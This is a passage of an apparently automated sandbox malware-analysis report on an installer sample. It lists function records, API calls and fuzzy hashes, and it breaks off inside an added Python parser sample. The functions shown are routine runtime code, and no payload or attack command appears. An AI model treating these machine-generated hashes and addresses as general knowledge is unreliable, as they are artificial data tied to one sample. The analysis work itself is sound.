                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 2cb62df17aafef443a8ffcb1c2f4f96b80a3d0961c4493707a5dc48b98663e13
                        • Instruction ID: 3153e907eae70aeedc693e0b3a78a09fa63890f82ba22c1b2a9270ac82d90f06
                        • Opcode Fuzzy Hash: 2cb62df17aafef443a8ffcb1c2f4f96b80a3d0961c4493707a5dc48b98663e13
                        • Instruction Fuzzy Hash: B9F08230A1521AFBDF059F51C80AB9D7A78EB05799F204560F401F6450CF308E41DB91
                        APIs
                        • __EH_prolog3.LIBCMT ref: 6CA6614E
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CA66159
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA661C7
                          • Part of subcall function 6CA66050: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA66068
                        • std::locale::_Setgloballocale.LIBCPMT ref: 6CA66174
                        • _Yarn.LIBCPMT ref: 6CA6618A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                        • String ID:
                        • API String ID: 1088826258-0
                        • Opcode ID: d072339bcd277cd6ef8c720cab69da96fd0232015c408fb829bdcb32b776517f
                        • Instruction ID: 0c6410883baced61d2e076cc02193028f058eb28d76fbe872190b0c0dde1c969
                        • Opcode Fuzzy Hash: d072339bcd277cd6ef8c720cab69da96fd0232015c408fb829bdcb32b776517f
                        • Instruction Fuzzy Hash: 80017175A005219BDB05DF22C958ABC7771FF95654B140009D81197BC1CF346E8ACB81
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: $!$@
                        • API String ID: 3519838083-2517134481
                        • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                        • Instruction ID: c27fefc8e3459725fd6b1eb119a983f06a63c596101aeba6b74df17b314250db
                        • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                        • Instruction Fuzzy Hash: BE129E74D0124ADFCF04CFE4D590ADDBBB5BF48308F188469E446ABB51DB31A985DBA0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog__aulldiv
                        • String ID: $SJ
                        • API String ID: 4125985754-3948962906
                        • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                        • Instruction ID: 5def515c8d2aa2782c830cc7db0ada387a4149c4f434e0860320fbd8eb51906a
                        • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                        • Instruction Fuzzy Hash: 31B15FB1D00249DFCB14CFA9CA809AEBBB5FF48314F24852EE459B7B50D735AA85CB50
                        APIs
                          • Part of subcall function 6CA66147: __EH_prolog3.LIBCMT ref: 6CA6614E
                          • Part of subcall function 6CA66147: std::_Lockit::_Lockit.LIBCPMT ref: 6CA66159
                          • Part of subcall function 6CA66147: std::locale::_Setgloballocale.LIBCPMT ref: 6CA66174
                          • Part of subcall function 6CA66147: _Yarn.LIBCPMT ref: 6CA6618A
                          • Part of subcall function 6CA66147: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA661C7
                          • Part of subcall function 6C932F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C932F95
                          • Part of subcall function 6C932F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C932FAF
                          • Part of subcall function 6C932F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C932FD0
                          • Part of subcall function 6C932F60: __Getctype.LIBCPMT ref: 6C933084
                          • Part of subcall function 6C932F60: std::_Facet_Register.LIBCPMT ref: 6C93309C
                          • Part of subcall function 6C932F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C9330B7
                        • std::ios_base::_Addstd.LIBCPMT ref: 6C93211B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 3332196525-1866435925
                        • Opcode ID: c48f33715b52f11473773c1912a1bf7a470162c5ca41dc13f9702cadf1c42aa0
                        • Instruction ID: 2763bbdffe896ae145ed5c8785839f8df1ade22b8e337b3905f651624e064b82
                        • Opcode Fuzzy Hash: c48f33715b52f11473773c1912a1bf7a470162c5ca41dc13f9702cadf1c42aa0
                        • Instruction Fuzzy Hash: C741C0B0A017098FDB00CF64C8497AEBBB5FF48314F149268E919AB792E775D985CBD0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: $CK$CK
                        • API String ID: 3519838083-2957773085
                        • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                        • Instruction ID: 7703028b9ce02b768911e02b0dd45d447ae3af63e2fab50b48831d2cdef72c6c
                        • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                        • Instruction Fuzzy Hash: 8F21B674E01615CBCB04DFE9D5901EEF7BAFF94304F14462AC422B3B91C7748A869A60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: 0$LrJ$x
                        • API String ID: 3519838083-658305261
                        • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                        • Instruction ID: b70a1c0e3c6c76a587bdf1f491b8c93d80a40da5130097cec633624de1518e22
                        • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                        • Instruction Fuzzy Hash: 1A215B32D1111D9BCF04CBD8DA91AEDB7F5EF59308F20015AD411B7640DB765E88CBA1
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAC2ECC
                          • Part of subcall function 6CAAD58A: __EH_prolog.LIBCMT ref: 6CAAD58F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: :hJ$dJ$xJ
                        • API String ID: 3519838083-2437443688
                        • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                        • Instruction ID: 2a9f8a8081b71061ecf733a277eb82901d6154adbc1a01f2e4a27a5835df2505
                        • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                        • Instruction Fuzzy Hash: 7021DAB0811B40CFC760CF6AC14429ABBF4BF2A708B40C95EC0AA97B11E7B4A64CCF55
                        APIs
                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CA79EF0,6C931DEA,00008000,6CA79EF0,?,?,?,6CA79A9F,6CA79EF0,?,00000000,6C931DEA), ref: 6CA79BE9
                        • GetLastError.KERNEL32(?,?,?,6CA79A9F,6CA79EF0,?,00000000,6C931DEA,?,6CA834BE,6CA79EF0,000000FF,000000FF,00000002,00008000,6CA79EF0), ref: 6CA79BF3
                        • __dosmaperr.LIBCMT ref: 6CA79BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorFileLastPointer__dosmaperr
                        • String ID: 8Q
                        • API String ID: 2336955059-4022487301
                        • Opcode ID: 8eafa5cd0209333ed80fb8f4de0740d9fdc9d769c14154b5aa734c46a210f02f
                        • Instruction ID: a87a7d4a06ce98c195b5e04960da9dbca62ed55ae541aa33dcd4a9e6fe54addd
                        • Opcode Fuzzy Hash: 8eafa5cd0209333ed80fb8f4de0740d9fdc9d769c14154b5aa734c46a210f02f
                        • Instruction Fuzzy Hash: B9012436720515AFCF098F7ACD8589E7B79FB86334B280209E814DB680EB70D98187A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: <J$DJ$HJ$TJ$]
                        • API String ID: 0-686860805
                        • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                        • Instruction ID: ffd60ce96d58af42f23326fe5953d1544a14514c8d7e7e209c144a54a300e635
                        • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                        • Instruction Fuzzy Hash: 1541B230C15349AFCF14DBB1D6908EEB7B8AF21308B24816AE12177A51EB35A6CDCB51
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv
                        • String ID:
                        • API String ID: 3732870572-0
                        • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                        • Instruction ID: 2f40ed6e8103ec238bd62e8f691b9b5f05d819c35cff4d2cdb8aa83591f51287
                        • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                        • Instruction Fuzzy Hash: 2911B7B62007447FEB254AA4CD44EBFBBBDEFC5744F14881DF14666650C672AC88C760
                        APIs
                        • GetLastError.KERNEL32(00000008,?,00000000,6CA77273), ref: 6CA737D7
                        • _free.LIBCMT ref: 6CA73834
                        • _free.LIBCMT ref: 6CA7386A
                        • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CA73875
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorLast_free
                        • String ID:
                        • API String ID: 2283115069-0
                        • Opcode ID: eef1a93dc1c29023b10eefc1bab6d9e1db6fc0347697cf58b72f1e6e59bdbf70
                        • Instruction ID: e724975c9fa08c98582c6023fdb8e4dcd974fe3fe4a87c3575f452467248c860
                        • Opcode Fuzzy Hash: eef1a93dc1c29023b10eefc1bab6d9e1db6fc0347697cf58b72f1e6e59bdbf70
                        • Instruction Fuzzy Hash: EE11777E3172016E9B655AB58D88AAA2569BBC22BCB2F0724F165C3BD0DF71CC8D4130
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,?,6CA8350C,00000000,00000000,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0), ref: 6CA84CF1
                        • GetLastError.KERNEL32(?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?,6CA79EF0,?,6CA7AB3C,6CA848D6), ref: 6CA84CFD
                          • Part of subcall function 6CA84D4E: CloseHandle.KERNEL32(FFFFFFFE,6CA84D0D,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?,6CA79EF0), ref: 6CA84D5E
                        • ___initconout.LIBCMT ref: 6CA84D0D
                          • Part of subcall function 6CA84D2F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CA84CCB,6CA8395E,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?), ref: 6CA84D42
                        • WriteConsoleW.KERNEL32(00000000,?,6CA8350C,00000000,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?), ref: 6CA84D22
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: be77d68f80428d8976cb147fa481194b7760a01ff87378deb0835947818a8b47
                        • Instruction ID: 17a7c3cbdcead5d15952b0d538ee1cc19c8491fad842962bd677c8555b10f94b
                        • Opcode Fuzzy Hash: be77d68f80428d8976cb147fa481194b7760a01ff87378deb0835947818a8b47
                        • Instruction Fuzzy Hash: 9EF03736511229BBCF121F91CC09D893F3AFF0A7A6B084510F90886224DB72D865DB90
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CA9C077
                          • Part of subcall function 6CA9BFF5: __EH_prolog.LIBCMT ref: 6CA9BFFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: :$\
                        • API String ID: 3519838083-1166558509
                        • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                        • Instruction ID: bccc6512fef62ab74747654f256d6d9f5792fd707d1593d171fcb825fe3fdf2c
                        • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                        • Instruction Fuzzy Hash: 9CE10530920A099ACF10EFA8C696BEEB7F1BF0531CF144219D456ABAD0DB71A5CDCB51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog__aullrem
                        • String ID: d%K
                        • API String ID: 3415659256-3110269457
                        • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                        • Instruction ID: 73467d28694270e5bc99504cd0f6dc6e2741ba1960d3d0d8ad1a0e66eff3121d
                        • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                        • Instruction Fuzzy Hash: 7381AE71A002099FDF01CF98C990BDEB7F5EF49348F28805AE858AB641D771D989DBE1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog3_
                        • String ID: 8Q
                        • API String ID: 2427045233-4022487301
                        • Opcode ID: ab176a573855c22d01f36f7e839ea78fcf500f84f40be29ceb791267b68f1117
                        • Instruction ID: 365bff15871a56d571819911ff5db83950cdb9e91a6f41ceffa719d82508971d
                        • Opcode Fuzzy Hash: ab176a573855c22d01f36f7e839ea78fcf500f84f40be29ceb791267b68f1117
                        • Instruction Fuzzy Hash: 9D71A43DD05256DBDB308F55C888AEEB6B9BF45328F184316EA2067A80DB7588C6C770
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$hfJ
                        • API String ID: 3519838083-1391159562
                        • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                        • Instruction ID: 36e0ec98f84a90bfba43d6babcf1c9e0997c187d39179a477182aceff1286741
                        • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                        • Instruction Fuzzy Hash: 28913970A20219DFCB10DFA9C9809EEFBF4FF19308F54451EE556A7A90D770AA88CB11
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAB6C5D
                          • Part of subcall function 6CAB561A: __EH_prolog.LIBCMT ref: 6CAB561F
                          • Part of subcall function 6CAB5A2E: __EH_prolog.LIBCMT ref: 6CAB5A33
                          • Part of subcall function 6CAB6EA5: __EH_prolog.LIBCMT ref: 6CAB6EAA
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: WZJ
                        • API String ID: 3519838083-1089469559
                        • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                        • Instruction ID: 143c9ddb59297f52e5a4f5a3b0acd03543b9cac88531b9378b663d2f0c5fae8d
                        • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                        • Instruction Fuzzy Hash: 1B813A31D00159DFCF15DFA8DA91ADDBBB4AF09308F14409AE416B77A0DB30AE89CB61
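The per-function records in this section (the "APIs", "Memory Dump Source" and "Similarity" blocks) are easier to triage once parsed into structured form. The parser below is an added example, not Joe Sandbox code. It assumes each record closes at its "Instruction Fuzzy Hash:" line, which is how the report lays them out, and uses as constructed input a trimmed excerpt of three records from this page: the WriteConsoleW/CreateFileW function, the GetLastError/_free function, and the __EH_prolog function above. It keeps direct call sites apart from calls reached through a sub-function ("Part of subcall function ...") and groups records by the base address of the dumped module (the "Offset:" of the source dump), so the two modules present here, at 6C8E0000 and 6CA96000, can be examined separately.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / Similarity).
Added example, not Joe Sandbox tooling. SAMPLE is a trimmed excerpt of three records
from this report, used as constructed input; records are assumed to end at the
'Instruction Fuzzy Hash:' line, as they do in the report layout."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• WriteConsoleW.KERNEL32(00000000,?,6CA8350C,00000000,00000000,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0), ref: 6CA84CF1
• GetLastError.KERNEL32(?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?,6CA79EF0,?,6CA7AB3C,6CA848D6), ref: 6CA84CFD
  • Part of subcall function 6CA84D4E: CloseHandle.KERNEL32(FFFFFFFE,6CA84D0D,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?,6CA79EF0), ref: 6CA84D5E
• ___initconout.LIBCMT ref: 6CA84D0D
  • Part of subcall function 6CA84D2F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CA84CCB,6CA8395E,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?), ref: 6CA84D42
• WriteConsoleW.KERNEL32(00000000,?,6CA8350C,00000000,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?), ref: 6CA84D22
Memory Dump Source
• Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• Instruction Fuzzy Hash: 9EF03736511229BBCF121F91CC09D893F3AFF0A7A6B084510F90886224DB72D865DB90
APIs
• GetLastError.KERNEL32(00000008,?,00000000,6CA77273), ref: 6CA737D7
• _free.LIBCMT ref: 6CA73834
• _free.LIBCMT ref: 6CA7386A
• SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CA73875
Memory Dump Source
• Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
• API ID: ErrorLast_free
• String ID:
• Instruction Fuzzy Hash: EE11777E3172016E9B655AB58D88AAA2569BBC22BCB2F0724F165C3BD0DF71CC8D4130
APIs
• __EH_prolog.LIBCMT ref: 6CAB6C5D
  • Part of subcall function 6CAB561A: __EH_prolog.LIBCMT ref: 6CAB561F
Memory Dump Source
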